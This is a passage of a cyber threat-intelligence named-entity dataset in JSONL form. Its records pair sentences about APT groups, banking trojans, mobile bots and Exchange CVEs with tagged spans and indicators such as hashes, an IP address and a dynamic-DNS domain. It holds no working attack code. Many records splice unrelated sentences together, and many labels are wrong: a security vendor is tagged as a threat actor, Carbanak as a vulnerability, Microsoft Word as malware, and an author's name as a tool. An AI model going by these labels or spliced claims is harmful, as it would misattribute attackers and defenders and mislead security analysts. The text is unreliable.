Government": [[165, 180]], "ORGANIZATION: DHS": [[192, 195]], "ORGANIZATION: FBI": [[200, 203]], "TOOL: Trojan malware": [[215, 229]], "TOOL: HARDRAIN": [[295, 303]], "THREAT_ACTOR: APT33": [[306, 311]], "IP_ADDRESS: 91.230.121.143": [[314, 328]], "DOMAIN: backupnet.ddns.net": [[329, 347]]}, "info": {"id": "cyberner_stix_train_000255", "source": "cyberner_stix_train"}} {"text": "Shamoon2 : 83be35956e5d409306a81e88a1dc89fd .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "FILEPATH: 83be35956e5d409306a81e88a1dc89fd": [[11, 43]]}, "info": {"id": "cyberner_stix_train_000256", "source": "cyberner_stix_train"}} {"text": "Command Description SEND_SMS Send an SMS from the bot to a specific number NEW_URL Update the C2 URL KILL Disable the bot PING_DELAY Update interval between each ping request CLEAN_IGNORE_PKG Empty list of overlayed apps WRITE_INJECTS Update target list READ_INJECTS Get current target list START_ADMIN Request Device Admin privileges ALL_SMS Get all SMS messages DISABLE_ACCESSIBILITY Stop preventing user from disabling the accessibility service ENABLE_ACCESSIBILITY Prevent user from disabling Access to the networks of these third-party service providers grants the MSS the ability to potentially access the networks of hundreds , if not thousands , of corporations around the world . 
The samples of Daserf that shared infrastructure were submitted to VirusTotal only from Japan multiple times in 2013 .", "spans": {"THREAT_ACTOR: MSS": [[570, 573]], "MALWARE: Daserf": [[704, 710]], "ORGANIZATION: VirusTotal": [[756, 766]]}, "info": {"id": "cyberner_stix_train_000257", "source": "cyberner_stix_train"}} {"text": "10002500: NvMswt 10002860: NvReg 10002880: NvStart 10002A80: NvStop This library is a newer version of the file collection module ( md5: 0369620eb139c3875a62e36bb7abdae8 ) wrapped in a DLL file .", "spans": {"FILEPATH: 0369620eb139c3875a62e36bb7abdae8": [[137, 169]], "TOOL: DLL": [[185, 188]]}, "info": {"id": "cyberner_stix_train_000258", "source": "cyberner_stix_train"}} {"text": "Nevertheless , Windows Defender ATP also supports blocking the implant across the entire enterprise , stopping large-scale intrusions in the early stages .", "spans": {"TOOL: Windows Defender ATP": [[15, 35]]}, "info": {"id": "cyberner_stix_train_000259", "source": "cyberner_stix_train"}} {"text": "The first are games of very low quality that mimic the experience of popular mobile games . This program is designed to capture keystrokes , take screenshots of the user 's desktop and get contents from the clipboard . To retrieve commands , ELMER sends HTTP GET requests to a hard-coded C2 server , and parses the HTTP response packets received from the C2 server for an integer string corresponding to the command that needs to be executed . 
Our researchers recently discovered a threat actor conducting several campaigns against government entities , military organizations and civilian users in Ukraine and Poland .", "spans": {"MALWARE: ELMER": [[242, 247]], "TOOL: C2": [[288, 290], [355, 357]], "ORGANIZATION: government entities": [[532, 551]], "ORGANIZATION: military organizations": [[554, 576]], "ORGANIZATION: civilian users": [[581, 595]]}, "info": {"id": "cyberner_stix_train_000260", "source": "cyberner_stix_train"}} {"text": "Sofacy is a group dedicated to the compromise of high-profile targets and the theft of confidential information .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]]}, "info": {"id": "cyberner_stix_train_000261", "source": "cyberner_stix_train"}} {"text": "Observe and look at the app ’ s display and text , stated functions , reviews from other users , and requested permissions before downloading . APT38 's increasingly aggressive targeting against banks . Additional jump instructions are supported when collecting block comparison variable candidates and mapping between the variable and ea or block number ( jnz/jle in JZCollector , The syntax of the command fragment includes “ scilc.exe ” , a native utility that is part of the MicroSCADA software suite .", "spans": {"THREAT_ACTOR: APT38": [[144, 149]], "ORGANIZATION: banks": [[195, 200]], "TOOL: JZCollector": [[368, 379]]}, "info": {"id": "cyberner_stix_train_000262", "source": "cyberner_stix_train"}} {"text": "f1e2bceae81ccd54777f7862c616f22b581b47e0dda5cb02d0a722168ef194a5 fc69fb278e12fc7f9c49a020eff9f84c58b71e680a9e18f78d4e6540693f557d .", "spans": {"FILEPATH: f1e2bceae81ccd54777f7862c616f22b581b47e0dda5cb02d0a722168ef194a5": [[0, 64]], "FILEPATH: fc69fb278e12fc7f9c49a020eff9f84c58b71e680a9e18f78d4e6540693f557d": [[65, 129]]}, "info": {"id": "cyberner_stix_train_000263", "source": "cyberner_stix_train"}} {"text": "To infect individuals with access to the data the actors desire , Scarlet Mimic deploys both spear-phishing and 
watering hole ( strategic web compromise ) attacks . The attacker is from North Korea .", "spans": {"THREAT_ACTOR: actors": [[50, 56]], "THREAT_ACTOR: Scarlet Mimic": [[66, 79]]}, "info": {"id": "cyberner_stix_train_000264", "source": "cyberner_stix_train"}} {"text": "Allows an application to read the user 's contacts data . Despite iPhone's minority share (14.5%) of the global smart phone market in 2016 , a specialized unit in the CIA's Mobile Development Branch produces malware to infest , control and exfiltrate data from iPhones and other Apple products running iOS , such as iPads . FIN7 is sometimes referred to as Carbanak Group , but these appear to be two groups using the same Carbanak malware and are therefore tracked separately .", "spans": {"THREAT_ACTOR: CIA's": [[167, 172]], "TOOL: iPhones": [[261, 268]], "TOOL: Apple": [[279, 284]], "TOOL: iOS": [[302, 305]], "TOOL: iPads": [[316, 321]], "THREAT_ACTOR: FIN7": [[324, 328]], "THREAT_ACTOR: Carbanak Group": [[357, 371]], "MALWARE: Carbanak": [[423, 431]]}, "info": {"id": "cyberner_stix_train_000265", "source": "cyberner_stix_train"}} {"text": "In other cases , threat actors placed web shells on externally accessible servers , sometimes behind a reverse proxy , to execute commands on the compromised system .", "spans": {"TOOL: web shells": [[38, 48]]}, "info": {"id": "cyberner_stix_train_000266", "source": "cyberner_stix_train"}} {"text": "We believe the formation of the first of these botnets began in January 2014 , using both unidentified infection vectors and the known malicious Tor node , and continued until our blogpost was published in November .", "spans": {"TOOL: Tor": [[145, 148]]}, "info": {"id": "cyberner_stix_train_000267", "source": "cyberner_stix_train"}} {"text": "Despite the public reporting and government accusations , SNAKEMACKEREL remains highly active .", "spans": {"THREAT_ACTOR: SNAKEMACKEREL": [[58, 71]]}, "info": {"id": "cyberner_stix_train_000268", "source": "cyberner_stix_train"}} 
{"text": "This alert includes technical indicators related to specific North Korean government cyber operations and provides suggested response actions to those indicators , recommended mitigation techniques , and information on reporting incidents to the U.S. Government .", "spans": {"ORGANIZATION: government": [[74, 84]], "ORGANIZATION: Government": [[251, 261]]}, "info": {"id": "cyberner_stix_train_000269", "source": "cyberner_stix_train"}} {"text": "During one intrusion , the threat actors installed it on over 70% of accessible hosts .", "spans": {}, "info": {"id": "cyberner_stix_train_000270", "source": "cyberner_stix_train"}} {"text": "The challenge is detecting known good software loading and running malware .", "spans": {}, "info": {"id": "cyberner_stix_train_000271", "source": "cyberner_stix_train"}} {"text": "Several of the decoy files appeared to be official documents associated with the Palestinian Authority – the body that governs the Palestinian Territories in the Middle East .", "spans": {"ORGANIZATION: Palestinian Authority": [[81, 102]]}, "info": {"id": "cyberner_stix_train_000272", "source": "cyberner_stix_train"}} {"text": "However , this situation will not last long : given the cybercriminals ’ interest in user bank accounts , the activity of mobile banking Trojans is expected to grow in other countries in 2014 . As we have noted in many earlier reports , attackers commonly use decoy files to trick victims into thinking a malicious document is actually legitimate . From this format , we were able to find several C&C URLs , including three additional Hong Kong universities ’ names . 
A typical web request to the frontend to exploit the SSRF vulnerability on CVE-2022 - 41040 involves some variation of path confusion that references the endpoint as shown below : The backend request for a typical ProxyNotShell exploitation is shown below : Once the PowerShell remoting service can be reached , the second step involves vulnerability CVE-2022 - 41082 being exploited in order to execute arbitrary commands .", "spans": {"MALWARE: decoy files": [[260, 271]], "URL: C&C": [[397, 400]], "VULNERABILITY: SSRF vulnerability": [[521, 539]], "VULNERABILITY: CVE-2022 - 41040": [[543, 559]]}, "info": {"id": "cyberner_stix_train_000273", "source": "cyberner_stix_train"}} {"text": "The URLs — abused as part of XLoader ’ s C & C — are hidden in three webpages , and the C & C server that XLoader connects to differ per region . Other open source and semi-legitimate pen-testing tools like nbtscan and powercat are being used for mapping available resources and lateral movement as well . During the analysis , we also noticed the “ veter1605_MAPS_10cr0.exe ” file slightly changed run after run , a few hours after the initial discovery the infection chain dropped it with different icons , different suffix , from “ cr0 ” to “ cr24 ” , and appendix from “ veter1605_ ” to “ veter2005_ ” .", "spans": {"MALWARE: XLoader": [[29, 36], [106, 113]], "MALWARE: nbtscan": [[207, 214]], "MALWARE: powercat": [[219, 227]], "FILEPATH: veter1605_MAPS_10cr0.exe": [[350, 374]]}, "info": {"id": "cyberner_stix_train_000274", "source": "cyberner_stix_train"}} {"text": "4254dc8c368cbc36c8a11035dcd0f4b05d587807fa9194d58f0ba411bfd65842 .", "spans": {"FILEPATH: 4254dc8c368cbc36c8a11035dcd0f4b05d587807fa9194d58f0ba411bfd65842": [[0, 64]]}, "info": {"id": "cyberner_stix_train_000275", "source": "cyberner_stix_train"}} {"text": "This malware variant also appears to be technically superior to many other banking Trojans being able to use its overlay attack even on Android 6 , which has technical 
improvements compared to the previous Android versions to prevent such attacks . PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach . The choices are interesting though , many correspond to what looks like the birth year of the controller ( ie . years in the late 1980s and early 1990s ) , and others seem to match what year the malware was launched in ( ie . in the 2000s , relatively close to the current year ) . Mandiant assesses with high confidence that UNC4899 is a cryptocurrency - focused element within the DPRK 's Reconnaissance General Bureau ( RGB ) .", "spans": {"SYSTEM: Android 6": [[136, 145]], "SYSTEM: Android": [[206, 213]], "VULNERABILITY: Flash vulnerability": [[357, 376]], "VULNERABILITY: CVE-2015-5119": [[379, 392]], "THREAT_ACTOR: UNC4899": [[770, 777]]}, "info": {"id": "cyberner_stix_train_000276", "source": "cyberner_stix_train"}} {"text": "We believe the only benefactor with the power to offer such comprehensive protection would be the government of the nation from which the group operates .", "spans": {}, "info": {"id": "cyberner_stix_train_000277", "source": "cyberner_stix_train"}} {"text": "We ’ve seen quite a few versions of these implants , which were relatively widespread at some point or still are .", "spans": {}, "info": {"id": "cyberner_stix_train_000278", "source": "cyberner_stix_train"}} {"text": "CTU researchers have observed the threat actors encrypting data using the password \" admin-windows2014 \" and splitting the RAR archives into parts in the recycler directory , with the same name as the uncompressed data .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "TOOL: RAR": [[123, 126]]}, "info": {"id": "cyberner_stix_train_000279", "source": "cyberner_stix_train"}} {"text": "This indication that the Dukes planned to use an arsenal of 5 malware toolsets in parallel suggests that they were operating 
with both significant resources and capacity .", "spans": {"THREAT_ACTOR: Dukes": [[25, 30]]}, "info": {"id": "cyberner_stix_train_000280", "source": "cyberner_stix_train"}} {"text": "The C & C address was specified in the code and was also unencrypted : In some versions , a dynamically generated low-level domain was used as an address : In its first communication , the Trojan sent the infected device ’ s IMEI to the C & C , and in return it received a set of rules for processing incoming SMSs ( phone numbers , keywords and regular expressions ) – these applied mainly to messages from banks , payment systems and mobile network operators . This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL . Overall , an organization will need multilayered security strategies , as Lazarus and other similar groups are experienced cybercriminals who employ different strategies to get past organizational defenses .", "spans": {"MALWARE: IOC files": [[477, 486]], "THREAT_ACTOR: HIDDEN COBRA": [[495, 507]], "TOOL: FALLCHILL": [[530, 539]], "THREAT_ACTOR: Lazarus": [[616, 623]], "THREAT_ACTOR: groups": [[642, 648]], "THREAT_ACTOR: cybercriminals": [[665, 679]]}, "info": {"id": "cyberner_stix_train_000281", "source": "cyberner_stix_train"}} {"text": "If it did , the malware downloaded additional modules , including ones allowing for the automatic creation of unauthorized payment orders , changing details in legal payment orders , etc . 
The second , aptly titled \" kontrakt87.doc \" , copies a generic telecommunications service contract from MegaFon , a large Russian mobile phone operator .", "spans": {"FILEPATH: kontrakt87.doc": [[217, 231]], "ORGANIZATION: telecommunications service": [[253, 279]], "ORGANIZATION: MegaFon": [[294, 301]], "ORGANIZATION: mobile phone operator": [[320, 341]]}, "info": {"id": "cyberner_stix_train_000282", "source": "cyberner_stix_train"}} {"text": "This unique on-device , just-in-time ( JIT ) approach inspired researchers to dub this malware as “ Agent Smith ” . Using XREFs during static analysis is a common technique to quickly find where functions of interest are called . The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 . Metamorfo has communicated with hosts over raw TCP on port 9999.[24 ]", "spans": {"MALWARE: Agent Smith": [[100, 111]], "TOOL: XREFs": [[122, 127]], "ORGANIZATION: Kaspersky": [[247, 256]], "VULNERABILITY: zero-day": [[282, 290]], "THREAT_ACTOR: BlackOasis": [[307, 317]], "MALWARE: Metamorfo": [[372, 381]]}, "info": {"id": "cyberner_stix_train_000283", "source": "cyberner_stix_train"}} {"text": "Other samples we analyzed had different combinations of modification to cryptography and serialization .", "spans": {}, "info": {"id": "cyberner_stix_train_000284", "source": "cyberner_stix_train"}} {"text": "This entry was posted on Mon Dec 04 12:00 EST 2017 and filed under Code , Reverse Engineering , Nick Harbour , and Incident Response . 
During the past few months , APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities ( CVE-2017-0199 and CVE-2017-11882 ) to target organizations in the Middle East .", "spans": {"MALWARE: entry": [[5, 10]], "TOOL: Reverse Engineering": [[74, 93]], "TOOL: Nick Harbour": [[96, 108]], "THREAT_ACTOR: APT34": [[164, 169]], "VULNERABILITY: CVE-2017-0199": [[260, 273]], "VULNERABILITY: CVE-2017-11882": [[278, 292]]}, "info": {"id": "cyberner_stix_train_000285", "source": "cyberner_stix_train"}} {"text": "Going one step further , these substrings are sometimes scattered throughout the code , retrieved from static variables and method calls . The group used malware with keylogging capabilities to monitor the computer of an executive who manages the company 's relationships with other telecommunications companies . ZXARPS Spoofing , redirection , packet capture . The U.S. Government has developed new mechanisms to help Ukraine identify cyber threats and recover from cyber incidents .", "spans": {"ORGANIZATION: telecommunications companies": [[283, 311]], "ORGANIZATION: U.S. Government": [[367, 382]]}, "info": {"id": "cyberner_stix_train_000286", "source": "cyberner_stix_train"}} {"text": "When all the necessary card details are entered and have been checked , all the information is uploaded to the C & C . Another decoy slideshow associated with the Bookworm attack campaign contains photos of an event called Bike for Dad 2015 . The Leviathan also occasionally used macro-laden Microsoft Word documents to target other US research and development organizations during this period .", "spans": {"MALWARE: decoy slideshow": [[127, 142]], "THREAT_ACTOR: Leviathan": [[247, 256]], "FILEPATH: macro-laden Microsoft Word documents": [[280, 316]], "ORGANIZATION: development organizations": [[349, 374]]}, "info": {"id": "cyberner_stix_train_000287", "source": "cyberner_stix_train"}} {"text": "Extract the Wi-Fi network 's password . 
After getting the IP , the ProjectSauron component tries to communicate with the remote server using its own ( ProjectSauron ) protocol as if it was yet another C&C server . In others , it persuades victims to download a report about a recent political affair pertaining to the Middle East and specifically to Palestinian matters . CrowdStrike Services recently investigated several Play ransomware intrusions where the common entry vector was suspected to be the Microsoft Exchange ProxyNotShell vulnerabilities CVE-2022 - 41040 and CVE-2022 - 41082 .", "spans": {"TOOL: ProjectSauron": [[67, 80], [151, 164]], "THREAT_ACTOR: CrowdStrike Services": [[372, 392]], "TOOL: Microsoft Exchange": [[504, 522]], "VULNERABILITY: ProxyNotShell vulnerabilities": [[523, 552]], "VULNERABILITY: CVE-2022 - 41040": [[553, 569]], "VULNERABILITY: CVE-2022 - 41082": [[574, 590]]}, "info": {"id": "cyberner_stix_train_000288", "source": "cyberner_stix_train"}} {"text": "Since it can use the accessibility service to become the default SMS app , it can also delete the SMS messages so only the attackers can see them . PLATINUM does not conduct its espionage activity to engage in direct financial gain , but instead uses stolen information for indirect economic advantages . As expected , OilRig is continuing their onslaught of attacks well into 2018 with continued targeting in the Middle East .", "spans": {"THREAT_ACTOR: PLATINUM": [[148, 156]], "ORGANIZATION: economic": [[283, 291]], "THREAT_ACTOR: OilRig": [[319, 325]]}, "info": {"id": "cyberner_stix_train_000289", "source": "cyberner_stix_train"}} {"text": "] us . RIPPER will examine the contents of directories associated with the targeted ATM vendors and will replace legitimate executables with itself . 
Filename: winload.dll .", "spans": {"MALWARE: RIPPER": [[7, 13]], "ORGANIZATION: ATM vendors": [[84, 95]], "FILEPATH: winload.dll": [[160, 171]]}, "info": {"id": "cyberner_stix_train_000290", "source": "cyberner_stix_train"}} {"text": "Patchwork also uses the Delphi file stealer as a similarity with Urpage , which suggests the three groups are somehow related . Even if CVE-2015-2546 affected Windows 10 , the exploitation would have required much more technical prowess to succeed ; ultimately , SMEP makes it more difficult for attackers .", "spans": {"THREAT_ACTOR: Patchwork": [[0, 9]], "VULNERABILITY: CVE-2015-2546": [[136, 149]], "SYSTEM: Windows": [[159, 166]], "THREAT_ACTOR: attackers": [[296, 305]]}, "info": {"id": "cyberner_stix_train_000291", "source": "cyberner_stix_train"}} {"text": "However , when used maliciously , accessibility features can be used to exploit legitimate services for malicious purposes , like with EventBot . Xagent is the original filename Xagent.exe whereas seems to be the version of the worm . FireEye tracks thousands of threat actors , but pays special attention to state-sponsored attackers who carry out advanced persistent threat ( APT ) attacks .", "spans": {"MALWARE: EventBot": [[135, 143]], "MALWARE: Xagent": [[146, 152]], "MALWARE: Xagent.exe": [[178, 188]], "MALWARE: worm": [[228, 232]], "ORGANIZATION: FireEye": [[235, 242]], "THREAT_ACTOR: actors": [[270, 276]], "THREAT_ACTOR: attackers": [[325, 334]]}, "info": {"id": "cyberner_stix_train_000292", "source": "cyberner_stix_train"}} {"text": "With each subsequent request , a new subdomain was generated . The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 . 
These files have the capability to download and install malware , install proxy and Remote Access Trojans ( RATs ) , connect to command and control ( C2 ) servers to receive additional instructions , and modify the victim 's firewall to allow incoming connections .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[67, 98]], "MALWARE: data-gathering implant": [[136, 158]], "MALWARE: RATs": [[304, 308]], "TOOL: C2": [[346, 348]]}, "info": {"id": "cyberner_stix_train_000293", "source": "cyberner_stix_train"}} {"text": "It is issued by Google once a user successfully logged into this account . BRONZE BUTLER are also fluent in Japanese , crafting phishing emails in native Japanese and operating successfully within a Japanese-language environment . However , Analysis into the malware and its functionality reveals that its capabilities are comparable to those employed in previous incidents and malware , such as and , which were both malware variants deployed in the past to impact electricity transmission and distribution via IEC-104 .", "spans": {"ORGANIZATION: Google": [[16, 22]], "THREAT_ACTOR: BRONZE BUTLER": [[75, 88]]}, "info": {"id": "cyberner_stix_train_000294", "source": "cyberner_stix_train"}} {"text": "Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems . 
In this case , the file used the software name \" Cyberlink \" , and a description of \" CLMediaLibrary Dynamic Link Library \" and listing version 4.19.9.98 .", "spans": {"VULNERABILITY: Carbanak": [[11, 19]], "ORGANIZATION: banks": [[79, 84]], "ORGANIZATION: payment systems": [[91, 106]], "FILEPATH: Cyberlink": [[158, 167]], "TOOL: Dynamic Link Library": [[210, 230]]}, "info": {"id": "cyberner_stix_train_000295", "source": "cyberner_stix_train"}} {"text": "Downeks and Quasar RAT Used in Recent Targeted Attacks Against Governments .", "spans": {"MALWARE: Downeks": [[0, 7]], "MALWARE: Quasar RAT": [[12, 22]]}, "info": {"id": "cyberner_stix_train_000296", "source": "cyberner_stix_train"}} {"text": "6e896099a3ceb563f43f49a255672cfd14d88799f29617aa362ecd2128446a47 .", "spans": {"FILEPATH: 6e896099a3ceb563f43f49a255672cfd14d88799f29617aa362ecd2128446a47": [[0, 64]]}, "info": {"id": "cyberner_stix_train_000297", "source": "cyberner_stix_train"}} {"text": "Executives can use this assessment to determine how to reduce risk to their organization's mission and critical assets .", "spans": {}, "info": {"id": "cyberner_stix_train_000298", "source": "cyberner_stix_train"}} {"text": "CTU researchers have not observed TG-3390 actors performing reconnaissance prior to compromising organizations .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[34, 41]]}, "info": {"id": "cyberner_stix_train_000299", "source": "cyberner_stix_train"}} {"text": "As the team at Scandinavian security group CSIS describes , malware known as MazarBOT is being distributed via SMS in Denmark and is likely to also be encountered in other countries . Rather , the Gallmaker 's attack activity we observed is carried out exclusively using LotL tactics and publicly available hack tools . 
To handle multiple control flow dispatchers , In one case , certutil was used to decode multiple files related to credential theft .", "spans": {"ORGANIZATION: CSIS": [[43, 47]], "MALWARE: MazarBOT": [[77, 85]], "THREAT_ACTOR: Gallmaker": [[197, 206]], "TOOL: LotL": [[271, 275]], "TOOL: publicly available hack tools": [[288, 317]]}, "info": {"id": "cyberner_stix_train_000300", "source": "cyberner_stix_train"}} {"text": "Whitefly compromises its victims using custom malware alongside open-source hacking tools and living off the land tactics , such as malicious PowerShell scripts . In April 2013 , a year after we found the \" bodiless \" Lurk module , the Russian cybercriminal underground exploited several families of malicious software that specialized in attacks on banking software .", "spans": {"THREAT_ACTOR: Whitefly": [[0, 8]], "TOOL: PowerShell scripts": [[142, 160]], "MALWARE: Lurk module": [[218, 229]]}, "info": {"id": "cyberner_stix_train_000301", "source": "cyberner_stix_train"}} {"text": "This makes the taking down and recovery of the network much harder and poses a considerable challenge for defenders . The threat actor has previously been the subject of a range of open source reporting , including most notably a report by FireEye comprehensively detailing the threat actor 's use of the Poison Ivy malware family and blog posts by Trend Micro3 similarly detailing the use of EvilGrab malware . OceanLotus : 72441fe221c6a25b3792d18f491c68254e965b0401a845829a292a1d70b2e49a Payload PNG ( loader #1 ) . 
Mandiant Intelligence assesses with high confidence that operations for which the pro - Russia hacktivist collective KillNet has claimed responsibility consistently mirror Russian strategic objectives , although we have not yet uncovered direct evidence of the collective ’s collaboration with or direction from Russian security services .", "spans": {"THREAT_ACTOR: threat actor": [[122, 134], [278, 290]], "ORGANIZATION: FireEye": [[240, 247]], "TOOL: Poison Ivy malware family": [[305, 330]], "ORGANIZATION: Trend Micro3": [[349, 361]], "TOOL: EvilGrab malware": [[393, 409]], "THREAT_ACTOR: OceanLotus": [[412, 422]], "FILEPATH: 72441fe221c6a25b3792d18f491c68254e965b0401a845829a292a1d70b2e49a": [[425, 489]], "ORGANIZATION: Mandiant Intelligence": [[518, 539]]}, "info": {"id": "cyberner_stix_train_000302", "source": "cyberner_stix_train"}} {"text": "The user simply needs to text a prescribed keyword to a prescribed number ( shortcode ) . As recently as this past week , researchers observed Chinese hackers escalating cyber-attack efforts to steal military research secrets from US universities . Exit / Quit Exit and shut down the botnet client . None The discovery was part of recent CrowdStrike Services investigations into several Play ransomware intrusions where the common entry vector was confirmed to be Microsoft Exchange .", "spans": {"ORGANIZATION: universities": [[234, 246]], "THREAT_ACTOR: CrowdStrike Services": [[338, 358]], "TOOL: Microsoft Exchange": [[464, 482]]}, "info": {"id": "cyberner_stix_train_000303", "source": "cyberner_stix_train"}} {"text": "Disable potentially harmful SQL-stored procedure calls .", "spans": {}, "info": {"id": "cyberner_stix_train_000304", "source": "cyberner_stix_train"}} {"text": "Earlier this year , our colleagues at Symantec uncovered an interesting story about the use of Equation group exploitation tools by an alleged Chinese group named Buckeye a.k.a APT3 , or UPS team . 
February saw three particularly interesting publications on the topic of macOS malware: a Trojan Cocoa application that sends system information including keychain data back to the attacker , a macOS version of APT28’s Xagent malware , and a new Trojan ransomware .", "spans": {"ORGANIZATION: Symantec": [[38, 46]], "THREAT_ACTOR: Equation": [[95, 103]], "THREAT_ACTOR: Buckeye": [[163, 170]], "THREAT_ACTOR: APT3": [[177, 181]], "MALWARE: Trojan": [[288, 294]], "THREAT_ACTOR: attacker": [[379, 387]], "THREAT_ACTOR: APT28’s": [[409, 416]], "FILEPATH: Trojan ransomware": [[444, 461]]}, "info": {"id": "cyberner_stix_train_000305", "source": "cyberner_stix_train"}} {"text": "Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word . The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors .", "spans": {"VULNERABILITY: CVE-2012-0158": [[79, 92]], "MALWARE: Microsoft Word": [[104, 118]], "FILEPATH: Okrum malware": [[153, 166]], "FILEPATH: backdoors": [[259, 268]]}, "info": {"id": "cyberner_stix_train_000306", "source": "cyberner_stix_train"}} {"text": "These new samples targeted Linux- and Unix-based operating systems , vulnerable servers , and internet of things ( IoT ) devices by exploiting known vulnerabilities with available exploits .", "spans": {"SYSTEM: Linux-": [[27, 33]], "SYSTEM: Unix-based": [[38, 48]]}, "info": {"id": "cyberner_stix_train_000307", "source": "cyberner_stix_train"}} {"text": "While many malware were written in Assembly during the ‘ old days ‘ of curiosity-driven virus writing , it has since become a rarity .", "spans": {"TOOL: Assembly": [[35, 43]]}, "info": {"id": "cyberner_stix_train_000308", "source": "cyberner_stix_train"}} {"text": "The developer of the code , Shanghai Adups Technology Co. 
, has apologized , contending that the code was intended for another one of its clients who requested better blocking of junk text messages and marketing calls . For exfiltration of stolen data , APT10 used WinRAR and renamed rar.exe to r.exe to create archives , upload them with curl.exe (renamed to c.exe , and again , use the cloud storage provider Dropbox . Daserf : 9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423 .", "spans": {"ORGANIZATION: Shanghai Adups Technology Co.": [[28, 57]], "THREAT_ACTOR: APT10": [[254, 259]], "TOOL: WinRAR": [[265, 271]], "MALWARE: rar.exe": [[284, 291]], "MALWARE: r.exe": [[295, 300]], "MALWARE: curl.exe": [[339, 347]], "MALWARE: c.exe": [[360, 365]], "TOOL: Dropbox": [[411, 418]], "MALWARE: Daserf": [[421, 427]], "FILEPATH: 9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423": [[430, 494]]}, "info": {"id": "cyberner_stix_train_000309", "source": "cyberner_stix_train"}} {"text": "My understanding is FireEye labels entities where definitive attribution is not yet possible with the “ TEMP ” moniker ( hence , TEMP.Veles ) – yet in this case FireEye developed and deployed the label , then appeared to move away from it in subsequent reporting .", "spans": {"ORGANIZATION: FireEye": [[20, 27], [161, 168]], "THREAT_ACTOR: TEMP.Veles": [[129, 139]]}, "info": {"id": "cyberner_stix_train_000310", "source": "cyberner_stix_train"}} {"text": "It's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost . 
CTU researchers have observed the Threat Group-3390 employing legitimate Kaspersky antivirus variants in analyzed samples .", "spans": {"TOOL: DNS-based attack technique": [[26, 52]], "ORGANIZATION: Arbor 's ASERT Team": [[183, 202]], "ORGANIZATION: CTU": [[239, 242]], "THREAT_ACTOR: Threat Group-3390": [[273, 290]], "ORGANIZATION: Kaspersky": [[312, 321]]}, "info": {"id": "cyberner_stix_train_000311", "source": "cyberner_stix_train"}} {"text": "Organizations in the government , energy , and technology sectors have been targeted by Magic Hound , specifically organizations based in or doing business in Saudi Arabia . On May 2 , 2016 , Palo Alto Networks published the report \" Prince of Persia \" , which provided the first public and widely-reported indication of Infy 's activities in Iran , while other publications either refrained from making the association or were not openly available .", "spans": {"ORGANIZATION: government": [[21, 31]], "ORGANIZATION: energy": [[34, 40]], "ORGANIZATION: technology sectors": [[47, 65]], "ORGANIZATION: Palo Alto Networks": [[192, 210]], "THREAT_ACTOR: Infy": [[321, 325]]}, "info": {"id": "cyberner_stix_train_000312", "source": "cyberner_stix_train"}} {"text": "This attack vector is increasingly popular with malicious actors as almost everyone on the planet carries at least one mobile device they interact with throughout any given day . This time , the attackers used new versions of the RoyalDNS malware and a Ketrican 2017 backdoor . 
Lazarus Group : HIDDEN COBRA , Guardians of Peace , ZINC , NICKEL ACADEMY .", "spans": {"MALWARE: RoyalDNS malware": [[230, 246]], "MALWARE: Ketrican": [[253, 261]], "THREAT_ACTOR: Lazarus Group": [[278, 291]], "THREAT_ACTOR: HIDDEN COBRA": [[294, 306]], "THREAT_ACTOR: Guardians of Peace": [[309, 327]], "THREAT_ACTOR: ZINC": [[330, 334]], "THREAT_ACTOR: NICKEL ACADEMY": [[337, 351]]}, "info": {"id": "cyberner_stix_train_000313", "source": "cyberner_stix_train"}} {"text": "INTERNET - open network sockets . In this sample , however , the module names were changed from actors and characters’ names to car models , namely BMW_x1” , BMW_x2” and up to BMW_x8” . One of the most interesting observations made during this analysis is that the amount of development effort devoted to Emissary significantly increased after we published our Operation Lotus Blossom report in June 2015 , resulting in many new versions of the Emissary Trojan .", "spans": {"MALWARE: BMW_x1”": [[148, 155]], "MALWARE: BMW_x2”": [[158, 165]], "MALWARE: BMW_x8”": [[176, 183]], "MALWARE: Emissary": [[305, 313]], "MALWARE: Emissary Trojan": [[445, 460]]}, "info": {"id": "cyberner_stix_train_000314", "source": "cyberner_stix_train"}} {"text": "Soon after , the customized utility was again evaluated in the malware testing environment .", "spans": {}, "info": {"id": "cyberner_stix_train_000315", "source": "cyberner_stix_train"}} {"text": "Long before Kryptowire 's announcement , Tim Strazzere , a mobile security researcher with RedNaga Security , contacted BLU Products in March 2015 after he found two vulnerabilities that could be traced to Adup 's code . This campaign brings to light further evidence supporting the assertions made by the Five Eyes nations , led by the U.S Department of Justice indictment against APT10 actors outlining the unprecedented scale of economic cyberespionage being conducted by the Chinese Ministry of State Security . 
